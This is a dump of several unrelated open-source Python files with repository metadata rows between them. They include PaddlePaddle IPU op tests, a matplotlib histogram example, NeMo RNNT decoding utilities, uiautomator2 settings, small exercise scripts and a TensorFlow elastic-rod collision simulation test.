def test_add_stock(self):
assert "已添加" in self.page.search("alibaba").add_stock().get_msg() | [
"indeyo@git.com"
] | indeyo@git.com |
812800e0ba2f557721a2771d61de9304ab8789cc | 3a1be455fc5e117bd8792ed46c59793f8b29a01f | /python/paddle/fluid/tests/unittests/ipu/test_greater_op_ipu.py | 934ad1014282703a4660e25725015fa588bb379a | [
"Apache-2.0"
] | permissive | liyancas/Paddle | 42d5e7c71c37b4e63bf54e6e31e82e40aef044ce | 98303291d27cb831b19111d82793159cbe9a85ca | refs/heads/develop | 2022-05-21T03:27:16.497238 | 2022-04-01T00:52:17 | 2022-04-01T00:52:17 | 72,499,865 | 0 | 0 | Apache-2.0 | 2022-02-11T08:16:37 | 2016-11-01T03:17:41 | Python | UTF-8 | Python | false | false | 5,422 | py | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy as np
import paddle
import paddle.static
from paddle.fluid.tests.unittests.ipu.op_test_ipu import IPUOpTest, ExecutionMode
@unittest.skipIf(not paddle.is_compiled_with_ipu(),
"core is not compiled with IPU")
class TestGreaterThan(IPUOpTest):
def setUp(self):
self.set_atol()
self.set_training()
self.set_test_op()
@property
def fp16_enabled(self):
return True
def set_test_op(self):
self.op = paddle.fluid.layers.greater_than
def set_op_attrs(self):
self.attrs = {}
def _test_base(self, exec_mode):
scope = paddle.static.Scope()
main_prog = paddle.static.Program()
startup_prog = paddle.static.Program()
main_prog.random_seed = self.SEED
startup_prog.random_seed = self.SEED
with paddle.static.scope_guard(scope):
with paddle.static.program_guard(main_prog, startup_prog):
x = paddle.static.data(
name=self.feed_list[0],
shape=self.feed_shape[0],
dtype='float32')
y = paddle.static.data(
name=self.feed_list[1],
shape=self.feed_shape[1],
dtype='float32')
out = self.op(x, y, **self.attrs)
fetch_list = [out.name]
if exec_mode == ExecutionMode.CPU_FP32:
place = paddle.CPUPlace()
else:
place = paddle.IPUPlace()
exe = paddle.static.Executor(place)
exe.run(startup_prog)
if exec_mode != ExecutionMode.CPU_FP32:
feed_list = self.feed_list
ipu_strategy = paddle.static.IpuStrategy()
ipu_strategy.set_graph_config(is_training=self.is_training)
if exec_mode == ExecutionMode.IPU_POPART_FP16:
ipu_strategy.set_precision_config(enable_fp16=True)
program = paddle.static.IpuCompiledProgram(
main_prog,
ipu_strategy=ipu_strategy).compile(feed_list, fetch_list)
else:
program = main_prog
feed = self.feed_fp32
if exec_mode > ExecutionMode.IPU_FP32:
feed = self.feed_fp16
result = exe.run(program, feed=feed, fetch_list=fetch_list)
return result[0]
def run_test_base(self):
output_dict = {}
for mode in ExecutionMode:
if mode > ExecutionMode.IPU_FP32 and not self.fp16_enabled:
break
output_dict[mode] = self._test_base(mode).flatten().astype(np.int32)
self.check(output_dict)
def set_feed_attr(self):
self.feed_shape = [x.shape for x in self.feed_fp32.values()]
self.feed_list = list(self.feed_fp32.keys())
def set_data_feed0(self):
x = np.random.randn(3, 4, 5)
y = np.random.randn(3, 4, 5)
self.feed_fp32 = {
"x": x.astype(np.float32),
"y": y.astype(np.float32),
}
self.feed_fp16 = {
"x": x.astype(np.float16),
"y": y.astype(np.float16),
}
self.set_feed_attr()
def set_data_feed1(self):
x = np.ones([1, 10])
y = np.ones([10])
self.feed_fp32 = {"x": x.astype(np.float32), "y": y.astype(np.float32)}
self.feed_fp16 = {"x": x.astype(np.float16), "y": y.astype(np.float16)}
self.set_feed_attr()
def set_data_feed2(self):
x = np.ones([1, 10])
y = np.zeros([1, 10])
self.feed_fp32 = {"x": x.astype(np.float32), "y": y.astype(np.float32)}
self.feed_fp16 = {"x": x.astype(np.float16), "y": y.astype(np.float16)}
self.set_feed_attr()
def set_data_feed3(self):
x = np.zeros([1, 10])
y = np.ones([1, 10])
self.feed_fp32 = {"x": x.astype(np.float32), "y": y.astype(np.float32)}
self.feed_fp16 = {"x": x.astype(np.float16), "y": y.astype(np.float16)}
self.set_feed_attr()
def test_case0(self):
self.set_data_feed0()
self.set_op_attrs()
self.run_test_base()
def test_case1(self):
self.set_data_feed1()
self.set_op_attrs()
self.run_test_base()
def test_case2(self):
self.set_data_feed2()
self.set_op_attrs()
self.run_test_base()
def test_case3(self):
self.set_data_feed3()
self.set_op_attrs()
self.run_test_base()
class TestLessThan(TestGreaterThan):
def set_test_op(self):
self.op = paddle.fluid.layers.less_than
class TestEqual(TestGreaterThan):
def set_test_op(self):
self.op = paddle.fluid.layers.equal
if __name__ == "__main__":
unittest.main()
| [
"noreply@github.com"
] | liyancas.noreply@github.com |
3d8f2df75d1761a1b24f57e53f4640e6fa499b23 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_117/ch27_2019_03_08_12_32_17_139310.py | beac39a68b2338e79d5a49e9521b451eff51529b | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 176 | py | cigarros=int(input("quantos cigarros fuma por dia?"))
anos=int(input("quantos anos?"))
Tempo_de_vida_perdido=((int(cigarros)*365)*int(anos))*10
print (Tempo_de_vida_perdido)
| [
"you@example.com"
] | you@example.com |
ebdec2b196300b6b5d65b0d2260ebb5f1d6fe028 | 7889f7f0532db6a7f81e6f8630e399c90438b2b9 | /1.5.0/mpl_examples/api/filled_step.py | 42d61dc917668293fb8e7bf059ba464eed8925e2 | [] | no_license | matplotlib/matplotlib.github.com | ef5d23a5bf77cb5af675f1a8273d641e410b2560 | 2a60d39490941a524e5385670d488c86083a032c | refs/heads/main | 2023-08-16T18:46:58.934777 | 2023-08-10T05:07:57 | 2023-08-10T05:08:30 | 1,385,150 | 25 | 59 | null | 2023-08-30T15:59:50 | 2011-02-19T03:27:35 | null | UTF-8 | Python | false | false | 6,444 | py | import itertools
from functools import partial
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as mticker
from cycler import cycler
from six.moves import zip
def filled_hist(ax, edges, values, bottoms=None, orientation='v',
**kwargs):
"""
Draw a histogram as a stepped patch.
Extra kwargs are passed through to `fill_between`
Parameters
----------
ax : Axes
The axes to plot to
edges : array
A length n+1 array giving the left edges of each bin and the
right edge of the last bin.
values : array
A length n array of bin counts or values
bottoms : scalar or array, optional
A length n array of the bottom of the bars. If None, zero is used.
orientation : {'v', 'h'}
Orientation of the histogram. 'v' (default) has
the bars increasing in the positive y-direction.
Returns
-------
ret : PolyCollection
Artist added to the Axes
"""
print(orientation)
if orientation not in set('hv'):
raise ValueError("orientation must be in {'h', 'v'} "
"not {o}".format(o=orientation))
kwargs.setdefault('step', 'post')
edges = np.asarray(edges)
values = np.asarray(values)
if len(edges) - 1 != len(values):
raise ValueError('Must provide one more bin edge than value not: '
'len(edges): {lb} len(values): {lv}'.format(
lb=len(edges), lv=len(values)))
if bottoms is None:
bottoms = np.zeros_like(values)
if np.isscalar(bottoms):
bottoms = np.ones_like(values) * bottoms
values = np.r_[values, values[-1]]
bottoms = np.r_[bottoms, bottoms[-1]]
if orientation == 'h':
return ax.fill_betweenx(edges, values, bottoms, **kwargs)
elif orientation == 'v':
return ax.fill_between(edges, values, bottoms, **kwargs)
else:
raise AssertionError("you should never be here")
def stack_hist(ax, stacked_data, sty_cycle, bottoms=None,
hist_func=None, labels=None,
plot_func=None, plot_kwargs=None):
"""
ax : axes.Axes
The axes to add artists too
stacked_data : array or Mapping
A (N, M) shaped array. The first dimension will be iterated over to
compute histograms row-wise
sty_cycle : Cycler or operable of dict
Style to apply to each set
bottoms : array, optional
The initial positions of the bottoms, defaults to 0
hist_func : callable, optional
Must have signature `bin_vals, bin_edges = f(data)`.
`bin_edges` expected to be one longer than `bin_vals`
labels : list of str, optional
The label for each set.
If not given and stacked data is an array defaults to 'default set {n}'
If stacked_data is a mapping, and labels is None, default to the keys
(which may come out in a random order).
If stacked_data is a mapping and labels is given then only
the columns listed by be plotted.
plot_func : callable, optional
Function to call to draw the histogram must have signature:
ret = plot_func(ax, edges, top, bottoms=bottoms,
label=label, **kwargs)
plot_kwargs : dict, optional
Any extra kwargs to pass through to the plotting function. This
will be the same for all calls to the plotting function and will
over-ride the values in cycle.
Returns
-------
arts : dict
Dictionary of artists keyed on their labels
"""
# deal with default binning function
if hist_func is None:
hist_func = np.histogram
# deal with default plotting function
if plot_func is None:
plot_func = filled_hist
# deal with default
if plot_kwargs is None:
plot_kwargs = {}
print(plot_kwargs)
try:
l_keys = stacked_data.keys()
label_data = True
if labels is None:
labels = l_keys
except AttributeError:
label_data = False
if labels is None:
labels = itertools.repeat(None)
if label_data:
loop_iter = enumerate((stacked_data[lab], lab, s) for lab, s in
zip(labels, sty_cycle))
else:
loop_iter = enumerate(zip(stacked_data, labels, sty_cycle))
arts = {}
for j, (data, label, sty) in loop_iter:
if label is None:
label = 'dflt set {n}'.format(n=j)
label = sty.pop('label', label)
vals, edges = hist_func(data)
if bottoms is None:
bottoms = np.zeros_like(vals)
top = bottoms + vals
print(sty)
sty.update(plot_kwargs)
print(sty)
ret = plot_func(ax, edges, top, bottoms=bottoms,
label=label, **sty)
bottoms = top
arts[label] = ret
ax.legend(fontsize=10)
return arts
# set up histogram function to fixed bins
edges = np.linspace(-3, 3, 20, endpoint=True)
hist_func = partial(np.histogram, bins=edges)
# set up style cycles
color_cycle = cycler('facecolor', 'rgbm')
label_cycle = cycler('label', ['set {n}'.format(n=n) for n in range(4)])
hatch_cycle = cycler('hatch', ['/', '*', '+', '|'])
# make some synthetic data
stack_data = np.random.randn(4, 12250)
dict_data = {lab: d for lab, d in zip(list(c['label'] for c in label_cycle),
stack_data)}
# work with plain arrays
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(9, 4.5), tight_layout=True)
arts = stack_hist(ax1, stack_data, color_cycle + label_cycle + hatch_cycle,
hist_func=hist_func)
arts = stack_hist(ax2, stack_data, color_cycle,
hist_func=hist_func,
plot_kwargs=dict(edgecolor='w', orientation='h'))
ax1.set_ylabel('counts')
ax1.set_xlabel('x')
ax2.set_xlabel('counts')
ax2.set_ylabel('x')
# work with labeled data
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(9, 4.5),
tight_layout=True, sharey=True)
arts = stack_hist(ax1, dict_data, color_cycle + hatch_cycle,
hist_func=hist_func)
arts = stack_hist(ax2, dict_data, color_cycle + hatch_cycle,
hist_func=hist_func, labels=['set 0', 'set 3'])
ax1.xaxis.set_major_locator(mticker.MaxNLocator(5))
ax1.set_xlabel('counts')
ax1.set_ylabel('x')
ax2.set_ylabel('x')
| [
"quantum.analyst@gmail.com"
] | quantum.analyst@gmail.com |
d8d1483f9f79e9e32c3b1a3028bd7eea445cce5b | b2cefb7a2a83aa93ee1b15a780b5ddf6c498215b | /nemo/collections/asr/parts/utils/rnnt_utils.py | 4b91eace8ad6f61848e401d3efd980c132c03d99 | [
"Apache-2.0"
] | permissive | VahidooX/NeMo | bfde8c9b48c818342a9c6290fb9dee62fafeca38 | 866cc3f66fab3a796a6b74ef7a9e362c2282a976 | refs/heads/main | 2023-07-23T19:13:39.948228 | 2022-04-29T21:51:54 | 2022-04-29T21:51:54 | 227,733,473 | 1 | 2 | Apache-2.0 | 2022-09-15T15:30:13 | 2019-12-13T01:55:21 | Jupyter Notebook | UTF-8 | Python | false | false | 5,863 | py | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright 2017 Johns Hopkins University (Shinji Watanabe)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional, Tuple, Union
import torch
@dataclass
class Hypothesis:
"""Hypothesis class for beam search algorithms.
score: A float score obtained from an AbstractRNNTDecoder module's score_hypothesis method.
y_sequence: Either a sequence of integer ids pointing to some vocabulary, or a packed torch.Tensor
behaving in the same manner. dtype must be torch.Long in the latter case.
dec_state: A list (or list of list) of LSTM-RNN decoder states. Can be None.
text: (Optional) A decoded string after processing via CTC / RNN-T decoding (removing the CTC/RNNT
`blank` tokens, and optionally merging word-pieces). Should be used as decoded string for
Word Error Rate calculation.
timestep: (Optional) A list of integer indices representing at which index in the decoding
process did the token appear. Should be of same length as the number of non-blank tokens.
alignments: (Optional) Represents the CTC / RNNT token alignments as integer tokens along an axis of
time T (for CTC) or Time x Target (TxU).
For CTC, represented as a single list of integer indices.
For RNNT, represented as a dangling list of list of integer indices.
Outer list represents Time dimension (T), inner list represents Target dimension (U).
The set of valid indices **includes** the CTC / RNNT blank token in order to represent alignments.
length: Represents the length of the sequence (the original length without padding), otherwise
defaults to 0.
y: (Unused) A list of torch.Tensors representing the list of hypotheses.
lm_state: (Unused) A dictionary state cache used by an external Language Model.
lm_scores: (Unused) Score of the external Language Model.
tokens: (Optional) A list of decoded tokens (can be characters or word-pieces.
last_token (Optional): A token or batch of tokens which was predicted in the last step.
"""
score: float
y_sequence: Union[List[int], torch.Tensor]
text: Optional[str] = None
dec_out: Optional[List[torch.Tensor]] = None
dec_state: Optional[Union[List[List[torch.Tensor]], List[torch.Tensor]]] = None
timestep: Union[List[int], torch.Tensor] = field(default_factory=list)
alignments: Optional[Union[List[int], List[List[int]]]] = None
length: Union[int, torch.Tensor] = 0
y: List[torch.tensor] = None
lm_state: Optional[Union[Dict[str, Any], List[Any]]] = None
lm_scores: Optional[torch.Tensor] = None
tokens: Optional[Union[List[int], torch.Tensor]] = None
last_token: Optional[torch.Tensor] = None
@dataclass
class NBestHypotheses:
"""List of N best hypotheses"""
n_best_hypotheses: Optional[List[Hypothesis]]
def is_prefix(x: List[int], pref: List[int]) -> bool:
"""
Obtained from https://github.com/espnet/espnet.
Check if pref is a prefix of x.
Args:
x: Label ID sequence.
pref: Prefix label ID sequence.
Returns:
: Whether pref is a prefix of x.
"""
if len(pref) >= len(x):
return False
for i in range(len(pref)):
if pref[i] != x[i]:
return False
return True
def select_k_expansions(
hyps: List[Hypothesis], logps: torch.Tensor, beam_size: int, gamma: float, beta: int,
) -> List[Tuple[int, Hypothesis]]:
"""
Obtained from https://github.com/espnet/espnet
Return K hypotheses candidates for expansion from a list of hypothesis.
K candidates are selected according to the extended hypotheses probabilities
and a prune-by-value method. Where K is equal to beam_size + beta.
Args:
hyps: Hypotheses.
beam_logp: Log-probabilities for hypotheses expansions.
beam_size: Beam size.
gamma: Allowed logp difference for prune-by-value method.
beta: Number of additional candidates to store.
Return:
k_expansions: Best K expansion hypotheses candidates.
"""
k_expansions = []
for i, hyp in enumerate(hyps):
hyp_i = [(int(k), hyp.score + float(logp)) for k, logp in enumerate(logps[i])]
k_best_exp_val = max(hyp_i, key=lambda x: x[1])
k_best_exp_idx = k_best_exp_val[0]
k_best_exp = k_best_exp_val[1]
expansions = sorted(filter(lambda x: (k_best_exp - gamma) <= x[1], hyp_i), key=lambda x: x[1],)[
: beam_size + beta
]
if len(expansions) > 0:
k_expansions.append(expansions)
else:
k_expansions.append([(k_best_exp_idx, k_best_exp)])
return k_expansions
| [
"noreply@github.com"
] | VahidooX.noreply@github.com |
72c20e2df29fcea30fe8377b3aafcd9722b96b2b | ef3ac1664accfe2f4f28800cb3dde383d04e2636 | /max len when alternating num are even and odd.py | 92e25b7c837f76ffaa71f84ffb3a4f3bebd3ae18 | [] | no_license | Shamabanu/python | 2466b253ead7249147844e22ede9017a2ffb299a | 76350525586b285773edb58912c1ba8eee35d1a6 | refs/heads/master | 2020-03-27T15:45:09.838053 | 2019-08-14T15:06:18 | 2019-08-14T15:06:18 | 146,736,750 | 3 | 6 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | num=input()
m=[]
s=0
for i in range(0,len(num)-1):
k=int(num[i])+int(num[i+1])
if k%2!=0:
s=s+1
else:
m.append(s)
s=0
m.append(s)
n=max(m)
if n==0:
print(0)
else:
print(n+1)
| [
"noreply@github.com"
] | Shamabanu.noreply@github.com |
02fe935d53fe2979fae0f6a73cfa11bc96de96d4 | 52d73c4b6ad70b62000d9d01e3dbab94f1edcb39 | /uiautomator2/settings.py | 7c6aea22b08ddeefc1661a927266e822bf257347 | [
"MIT"
] | permissive | zenjan1/uiautomator2 | ff50abae9bfe7430aea77bbf4431eab472153a8c | 907ea86099719edaec14f802f5182f1a8b359840 | refs/heads/master | 2022-06-04T06:44:07.467582 | 2020-05-03T07:17:14 | 2020-05-03T07:17:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,795 | py | # coding: utf-8
#
import json
import logging
import pprint
from typing import Any
class Settings(object):
def __init__(self, d):
self._d = d
self._defaults = {
"post_delay": 0, # Deprecated
"wait_timeout": 20.0,
"xpath_debug": False, #self._set_xpath_debug,
"uiautomator_runtest_app_background": True,
"click_after_delay": 0.2,
"click_before_delay": 0.2,
}
self._props = {
"post_delay": (float, int),
"xpath_debug": bool,
}
for k, v in self._defaults.items():
if k not in self._props:
self._props[k] = (float, int) if type(v) in (float, int) else type(v)
def get(self, key: str) -> Any:
return self._defaults.get(key)
def set(self, key: str, val: Any):
if key not in self._props:
raise AttributeError("invalid attribute", key)
if not isinstance(val, self._props[key]):
print(key, self._props[key])
raise TypeError("invalid type, only accept: %r" % self._props[key])
# function call
callback = self._defaults[key]
if callable(callback):
callback(val)
self._defaults[key] = val
def __setitem__(self, key: str, val: Any):
self.set(key, val)
def __getitem__(self, key: str) -> Any:
if key not in self._defaults:
raise RuntimeError("invalid key", key)
return self.get(key)
def __repr__(self):
return pprint.pformat(self._defaults)
# return self._defaults
# if __name__ == "__main__":
# settings = Settings(None)
# settings.set("pre_delay", 10)
# print(settings['pre_delay'])
# settings["post_delay"] = 10
| [
"codeskyblue@gmail.com"
] | codeskyblue@gmail.com |
1735958f710b4c8ae98f9c5ce173e0ec8d124e60 | 2339a41252821d69b808d15f22a8b5913838392e | /Rod/test_MCCD.py | d066b8a1807df9c72a6e9034adc23eb8798f56f3 | [] | no_license | xinyazhang/tfhair | 26d7c3e059e55dd6f51b6138f6e842ffce10e58f | a17df7d81cb9baf170a965ccc530f48582d60b62 | refs/heads/master | 2021-06-18T14:21:29.004713 | 2017-05-06T19:40:21 | 2017-05-06T19:40:21 | 87,961,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,524 | py | #!/usr/bin/env python2
'''
Test for Motions
'''
import numpy as np
from ElasticRod import *
import RodHelper as helper
import tensorflow as tf
import math
from math import pi
import progressbar
def run_with_bc(n, h, rho, icond, path, icond_updater=None):
'''
Run the simulation with given boundary conditions (icond)
'''
if icond.ccd_threshold is None:
icond.ccd_threshold = 30.0
tf.reset_default_graph()
irod = helper.create_TFRodS(2, n)
irod.clone_args_from(icond)
if icond.sparse_anchor_indices is not None:
irod.sparse_anchor_indices = tf.placeholder(tf.int32, shape=[None, 2])
irod.sparse_anchor_values = tf.placeholder(tf.float32, shape=[None, 3])
orod = irod.CalcNextRod(h)
rrod = orod.CalcPenaltyRelaxationTF(h)
''' Hack: This check collision b/w Rod 0 Seg # and Rod 1 Seg # '''
# rrod.sela = tf.constant(np.array([[0, i] for i in range(n)]), dtype=tf.int32)
# rrod.selb = tf.constant(np.array([[1, i] for i in range(n)]), dtype=tf.int32)
rrod = rrod.CreateCCDNode(irod, h)
# TODO: Calulate SelS in ElasticRodS directly.
# sela_data = np.array([[0, i] for i in range(n)])
# selb_data = np.array([[1, i] for i in range(n)])
# pfe = TFGetEConstaint(irod)
saver = helper.RodSaver(path)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
nframe = 720
# nframe = 120
with progressbar.ProgressBar(max_value=nframe) as progress:
for frame in range(nframe):
if icond_updater is not None:
icond_updater(h, icond)
#inputdict = {irod.xs:xs, irod.restl:rl, irod.thetas:thetas, irod.xdots:xdots, irod:omegas:omegas}
inputdict = helper.create_dict([irod], [icond])
# inputdict.update({rrod.sela: sela_data, rrod.selb: selb_data})
# print(inputdict)
saver.add_timestep(
[icond.xs],
[icond.thetas],
[icond.refd1s],
[icond.refd2s])
# xs, xdots, thetas, omegas = sess.run([orod.xs, orod.xdots,
# orod.thetas, orod.omegas], feed_dict=inputdict)
# print(pfe.eval(feed_dict=inputdict))
# print(orod.XForce.eval(feed_dict=inputdict))
# print("xdots {}".format(xdots))
# print("thetas {}".format(icond.thetas))
icond = rrod.Relax(sess, irod, icond, ccd_h=h, ccd_broadthresh=icond.ccd_threshold)
# print('xs {}'.format(icond.xs))
# print("refd1s {}".format(icond.refd1s))
# print("refd2s {}".format(icond.refd2s))
progress.update(frame+1)
saver.close()
def run_test0():
'''
Test 0: 90-degree Crossing, homogeneous mass
'''
n = 1
h = 1.0/1024.0
rho = 1.0
roda_xs = np.array([
[-1,0,0],
[0,0,0],
])
rodb_xs = np.array([
[-0.5,0.5,-0.5],
[-0.5,0.5,0.5],
])
rods_xs = np.array([roda_xs, rodb_xs])
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.array([
[0,5,0],
[0,5,0],
])
rodb_xdots = np.array([
[0,0,0],
[0,0,0],
])
rods_xdots = np.array([roda_xdots, rodb_xdots])
initd1 = np.array([
[0,1,0],
[1,0,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
run_with_bc(n, h, rho, icond, '/tmp/tfccd0')
def run_test1():
'''
Test 0: 90-degree Crossing
'''
n = 1
h = 1.0/1024.0
rho = 1.0
roda_xs = np.array([
[-1,0,0],
[0,0,0],
])
rodb_xs = np.array([
[-0.5,0.5,-1],
[-0.5,0.5,1],
])
rods_xs = np.array([roda_xs, rodb_xs])
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.array([
[0,5,0],
[0,5,0],
])
rodb_xdots = np.array([
[0,0,0],
[0,0,0],
])
rods_xdots = np.array([roda_xdots, rodb_xdots])
initd1 = np.array([
[0,1,0],
[1,0,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
run_with_bc(n, h, rho, icond, '/tmp/tfccd1')
def run_test2():
'''
Test 2: 45-degree Crossing
'''
n = 1
h = 1.0/1024.0
rho = 1.0
roda_xs = np.array([
[-1,0,0],
[0,0,0],
])
rodb_xs = np.array([
[-0.5, 0.0,-0.5],
[-0.5, 1.0, 0.5],
])
rods_xs = np.array([roda_xs, rodb_xs])
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.array([
[0,5,0],
[0,5,0],
])
rodb_xdots = np.array([
[0,0,0],
[0,0,0],
])
rods_xdots = np.array([roda_xdots, rodb_xdots])
initd1 = np.array([
[0,1,0],
[1,0,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
run_with_bc(n, h, rho, icond, '/tmp/tfccd2')
def run_test3():
'''
Test 3: Multiple segments
'''
n = 3
h = 1.0/1024.0
rho = 1.0
roda_xs = np.array([
[-2,0,0],
[-1,0,0],
[0,0,0],
[1,0,0],
])
rodb_xs = np.array([
[-2, 1,-1],
[-1, 1, 1],
[ 0, 1,-1],
[ 1, 1, 1],
])
rods_xs = np.array([roda_xs, rodb_xs])
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.array([
[0,5,0],
[0,5,0],
[0,5,0],
[0,5,0],
])
rodb_xdots = np.array([
[0,0,0],
[0,0,0],
[0,0,0],
[0,0,0],
])
rods_xdots = np.array([roda_xdots, rodb_xdots])
initd1 = np.array([
[0,1,0],
[1,0,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
run_with_bc(n, h, rho, icond, '/tmp/tfccd3')
def run_test4():
'''
Test 4: Multiple segments
'''
n = 10
h = 1.0/1024.0
rho = 1.0
roda_xs = helper.create_string(np.array([0,0.0,-2.25]), np.array([0,0.0,2.75]), n)
rodb_xs = helper.create_string(np.array([1,-2.25,0.0]), np.array([1,2.75,0.0]), n)
rods_xs = np.array([rodb_xs, roda_xs]) # B First
# print(rods_xs)
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.zeros(shape=[n+1,3], dtype=np.float32)
rodb_xdots = np.zeros(shape=[n+1,3], dtype=np.float32)
rods_xdots = np.array([roda_xdots, rodb_xdots])
rods_xdots[0,:,0] = -10.0
print(rods_xdots)
initd1 = np.array([
[1,0,0],
[-1,0,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
icond.alpha = 0.05
icond.beta = 0.05
# icond.constraint_tolerance = 1 # low-stiffness rods
# icond.anchor_stiffness = 1e3 # but we need maintain the anchor constrants
# icond.t = 0.0
run_with_bc(n, h, rho, icond, '/tmp/tfccd4')
def run_test5():
'''
Test 5: 0-degree Crossing
'''
n = 1
h = 1.0/1024.0
rho = 1.0
roda_xs = np.array([
[-1,0,0],
[0,0,0],
])
rodb_xs = np.array([
[-1,1.0,0],
[0, 1.0,0],
])
rods_xs = np.array([roda_xs, rodb_xs])
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.array([
[0,5,0],
[0,5,0],
])
rodb_xdots = np.array([
[0,-5,0],
[0,-5,0],
])
rods_xdots = np.array([roda_xdots, rodb_xdots])
initd1 = np.array([
[0,1,0],
[0,1,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
run_with_bc(n, h, rho, icond, '/tmp/tfccd5')
def run_test6():
'''
Test 6: Twisting strings
'''
n = 32
h = 1.0/1024.0
rho = 1.0
delta = (1.0/n)/2.0
roda_xs = helper.create_string(np.array([0,0,-2.5 + delta]), np.array([0,0,2.5 + delta]), n)
rodb_xs = helper.create_string(np.array([1,0.01,-2.5]), np.array([1,0.01,2.5]), n)
rods_xs = np.array([rodb_xs, roda_xs]) # B First
# print(rods_xs)
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.zeros(shape=[n+1,3], dtype=np.float32)
rodb_xdots = np.zeros(shape=[n+1,3], dtype=np.float32)
rods_xdots = np.array([roda_xdots, rodb_xdots])
initd1 = np.array([
[0,1,0],
[0,1,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
icond.alpha = 0.00125
icond.beta = 0.05
icond.constraint_tolerance = 5 # low-stiffness rods
icond.anchor_stiffness = 1e3 # but we need maintain the anchor constrants
icond.t = 0.0
icond.ccd_threshold = 0.05/h
def DualRotator(h, icond):
#icond.sparse_anchor_values[2, :] = np.array([math.cos(icond.t), math.sin(icond.t), 5.0], dtype=np.float32)
icond.sparse_anchor_values = np.array([
[math.cos(icond.t), math.sin(icond.t)+0.01, -2.5 + icond.t * 0.005],
[1, 0.01, 2.5],
# [math.cos(-icond.t), math.sin(-icond.t)+0.01, 2.5],
[0,0,-2.5 + delta],
[0,0,2.5 + delta],
], dtype=np.float32)
# print([math.cos(icond.t), math.sin(icond.t), 5.0])
# print(icond.sparse_anchor_values)
# print(icond.t)
#icond.sparse_anchor_values[3] = np.array([math.cos(-icond.t), math.sin(-icond.t), 0.0 + icond.t])
icond.t += h * 64
icond.sparse_anchor_indices = np.array([
[0, 0],
[0, n],
[1, 0],
[1, n],
], dtype=np.int32)
icond.sparse_anchor_values = np.array([
rods_xs[0,0,:],
rods_xs[0,-1,:],
rods_xs[1,0,:],
rods_xs[1,-1,:],
], dtype=np.float32)
# icond.g = 9.8
run_with_bc(n, h, rho, icond, '/tmp/tfccd6', icond_updater=DualRotator)
